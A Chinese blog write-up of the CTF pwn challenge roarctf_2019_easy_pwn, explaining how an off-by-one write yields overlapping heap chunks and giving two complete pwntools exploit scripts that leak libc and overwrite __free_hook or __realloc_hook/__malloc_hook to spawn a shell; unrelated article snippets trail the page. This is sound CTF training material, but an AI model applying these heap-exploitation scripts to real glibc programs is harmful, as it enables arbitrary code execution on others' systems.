roarctf_2019_easy_pwn
这篇博客主要记录当直接在malloc_hook中直接写入one_gadget不起作用时的一些处理方法。题目附件:https://buuoj.cn/challenges#roarctf_2019_easy_pwn
题目分析:
- 题目提供了Create, Write, Drop, Show四个函数,其中Write函数存在off by one漏洞
利用思路:
- 利用off by one修改chunk的size达到overlap的目的
这道题目的难点在于向malloc_hook中写入的one_gadget全部失效。在一番苦思后我决定看看大佬的博客,现记录一下其中的处理方法:
解法一:
- 在malloc_hook附近构造fake_chunk,通过修改fastbin中的chunk的fd指针把fake_chunk放入fastbin中,然后在分配出去
- 修改main_arean中top_chunk的地址为free_hook附近
- 分配chunk控制free_hook
- 这一步有两个选择,一是向free_hook中写入one_gadget,二是向free_hook中写入system
exp如下:
from pwn import *
from LibcSearcher import *
context(os = 'linux', arch = 'amd64', log_level = 'debug', terminal = ['tmux', 'splitw', '-h'])
p = process('./roarctf_2019_easy_pwn')
#p = remote('node3.buuoj.cn', 29382) def Create(size):
#p.sendlineafter('choice: ', '1')
p.recvuntil('choice: ')
p.sendline('1')
p.sendlineafter('size: ', str(size)) def Write(index, size, content):
p.sendlineafter('choice: ', '2')
p.sendlineafter('index: ', str(index))
p.sendlineafter('size: ', str(size))
p.sendafter('content', content) def Drop(index):
p.sendlineafter('choice: ', '3')
p.sendlineafter('index: ', str(index)) def Show(index):
p.sendlineafter('choice: ', '4')
p.sendlineafter('index: ', str(index)) Create(40)
Create(32)
Create(128) #0x80
Create(16)
payload = 'A'*0x28 + '\x51'
Write(0, 50, payload)
payload = '\x00'*0x18 + '\x71'
payload = payload.ljust(0x80, '\x00')
Write(2, 128, payload)
Drop(1)
Create(64) #0x40, chunk 1
payload = '\x00'*0x28 + '\x91'
payload = payload.ljust(64, '\x00')
Write(1, 64, payload)
Drop(2)
Show(1) p.recv(0x30+9)
malloc_hook = u64(p.recv(8)) - 0x68
log.success("malloc_hook ==> {:#x}".format(malloc_hook)) libc = LibcSearcher('__malloc_hook', malloc_hook)
libc_base = malloc_hook - libc.dump('__malloc_hook')
log.success("libc_base ==> {:#x}".format(libc_base))
one_gadget = libc_base + 0x4526a
log.success("one_gadget ==> {:#x}".format(one_gadget))
free_hook = libc_base + libc.dump('__free_hook')
log.success("free_hook ==> {:#x}".format(free_hook))
fake_chunk = free_hook - 0xb58
log.success("fake_chunk ==> {:#x}".format(fake_chunk))
system_addr = libc_base + libc.dump('system')
log.success("system_addr ==> {:#x}".format(system_addr)) Create(96) #0x60
Drop(2)
payload = '\x00' * 0x28 + p64(0x71) + p64(malloc_hook - 0xb) + '\x00'*8
Write(1, 64, payload) Create(96)
Create(104)
payload = '\x00'*0x60 + '\x00'*3 + p64(free_hook-0xb58)[0:6]
Write(4, 114, payload) for i in range(11):
Create(256) payload = '\x00'*0xa8 + p64(one_gadget)
payload = payload.ljust(256, '\x00')
Write(15, 256, payload) Write(3, 16, '/bin/sh\x00'.ljust(16, '\x00'))
#gdb.attach(p)
Drop(3)
p.interactive()
解法二:
- 在malloc_hook附近构造fake_chunk,通过修改fastbin中的chunk的fd指针把fake_chunk放入fastbin中,然后在分配出去
- 因为realloc_hook在malloc_hook - 0x8的位置,所以我们向realloc_hook中写入one_gadget,向malloc_hook中写入realloc函数的地址
exp如下:
from pwn import*
p = process("./roarctf_2019_easy_pwn")
#p = remote('node3.buuoj.cn', 25192)
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
a = ELF("/lib/x86_64-linux-gnu/libc.so.6")
def add(size):
p.recvuntil("choice:")
p.sendline("1")
p.recvuntil("size:")
p.sendline(str(size)) def edit(idx,size,content):
p.recvuntil("choice:")
p.sendline("2")
p.recvuntil("index: ")
p.sendline(str(idx))
p.recvuntil("size:")
p.sendline(str(size))
p.recvuntil("content: ")
p.sendline(content) def delete(idx):
p.recvuntil("choice:")
p.sendline("3")
p.recvuntil("index: ")
p.sendline(str(idx)) def show(idx):
p.recvuntil("choice:")
p.sendline("4")
p.recvuntil("index: ")
p.sendline(str(idx)) add(24) #0
add(24) #1
add(56) #2
add(34) #3
add(56) #4
edit(0,34,'aaaaaaaaaaaaaaaaaaaaaaaa'+'\x91')
delete(1)
add(56) #1
show(2)
address = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print "address:" + hex(address) libc_Addr = address-(0x7ffff7dd1b78-0x7ffff7a0d000) malloc_hook_fkchunk = libc_Addr + 0x3c4aed
log.success("malloc_hook_fkchunk ==> {:#x}".format(malloc_hook_fkchunk)) #one = libc_Addr+0x4526a#0xf02a4#0x4526a0xf1147 #0x45216#
one = libc_Addr + 0xf1147
log.success("one_gadget ==> {:#x}".format(one))
ralloc_hook = libc_Addr +a.symbols['__realloc_hook']
realloc=libc_Addr+a.symbols['__libc_realloc']
log.success("realloc ==> {:#x}".format(realloc))
realloc_addr = libc_Addr + a.symbols['realloc']
log.success("realloc_addr ==> {:#x}".format(realloc_addr))
malloc_addr = libc_Addr + a.symbols['malloc']
log.success("malloc_addr ==> {:#x}".format(malloc_addr)) add(56)#5
add(24)#6
add(24)#7-->x91
add(90) #8
add(90) #9
add(24) #10 edit(6,34,'aaaaaaaaaaaaaaaaaaaaaaaa'+'\x91')
delete(7)
delete(8)
add(110) #7 edit(7,120,'l'*0x10+'\x00'*8+'\x71'+'\x00'*7+p64(malloc_hook_fkchunk)+'\x00'*70)
add(90)
add(90)#11
edit(11,100,'l'*0x3 +p64(0)+p64(one)+ p64(realloc_addr)+'\x00'*63) p.recvuntil("choice:")
p.sendline("1")
p.recvuntil("size:")
#gdb.attach(p)
p.sendline(str(90))
p.interactive()
roarctf_2019_easy_pwn的更多相关文章
- [BUUCTF]PWN——roarctf_2019_easy_pwn(详解)
roarctf_2019_easy_pwn 附件 步骤: 例行检查,64位程序,保护全开 试运行一下程序,看看大概的情况,经典的堆块的菜单 64位ida载入,改了一下各个选项的函数名,方便看程序(按N ...
- BUUCTF pwn一分题目
因为以前做过一些题目,看见1分题目也不太多了,就想着,抓紧点把1分题都刷一下吧.所以开个帖子记录一下,题目简单的话就只贴exp了. [BJDCTF 2nd]secret 这里有一个输入可以进行溢出,n ...
随机推荐
- RF,SVM和NN的优缺点
1. 随机森林优缺点 随机森林(RF)是Bagging的一个扩展变体.RF在以决策树为基分类器进行集成的基础上,进一步在决策树的训练过程中引入了随机属性选择. Bagging就是对数据集训练多个基分类 ...
- C# winform 弹出窗体给父窗体传值
Winform程序有很多传值的方法,抱着学习的态度.利用委托注册事件的方法,给窗体统一添加事件: 首先定义一个Frm_Base: namespace 任意 { public partial class ...
- 运放引脚悬空危害大,单片机PWM信号进入运放需要考虑避免运放引脚悬空
1 问题电路 在没有烧录程序时,单片机的PWM引脚无信号,导致运放的3脚悬空,从而导致运放输出3.5V电压,从二导致后面驱动电流非常大,容易对驱动器件造成损坏 2 改进电路 通过在单片机输出增加下拉电 ...
- 初识ABP vNext(2):ABP启动模板
目录 前言 开始 AbpHelper 模块安装 最后 前言 上一篇介绍了ABP的一些基础知识,本篇继续介绍ABP的启动模板.使用ABP CLI命令就可以得到这个启动模板,其中包含了一些基础功能模块,你 ...
- SSRF 跨站请求伪造学习笔记
参考文章: 了解SSRF,这一篇就足够了 SSRF 学习之路 SSRF绕过方法总结 Weblogic SSRF漏洞 What-是什么 SSRF(Server-Side Request Forgery) ...
- github Repository not found 解决办法
git pull的时候遇到下面的报错. remote: Repository not found fatal: repository 'https://github.com/MyRepo/projec ...
- 基于官方Drone-CI 的alpine版本asia亚洲时区构建支持. Drone-CI based alpine Timezone Build
基于官方Drone-CI 的alpine版本最简化添加亚洲时区Dockerfile构建支持. iotd@Github: drone-ci-based-alpine-timezone-build 如添加 ...
- Micro LED巨量转移技术研究进展
近年来,Micro LED因其功耗低.响应快.寿命长.光效率高等特点,被视为继LCD.OLED之后的新一代显示面板技术.Micro LED的英文全名是Micro Light Emitting Diod ...
- linux tmpfs及消耗内存脚本
一.tmpfs介绍 tmpfs是一种虚拟内存文件系统,正如这个定义它最大的特点就是它的存储空间在VM里面VM是由linux内核里面的vm子系统管理的东西,现在大多数操作系统都采用了虚拟内存管理机制VM ...
- count.exe 个人项目
Github项目地址:https://github.com/bravedreamer/wordCount/tree/master/wc 一.题目描述: Word Count1. 实现一个简单而完整的软 ...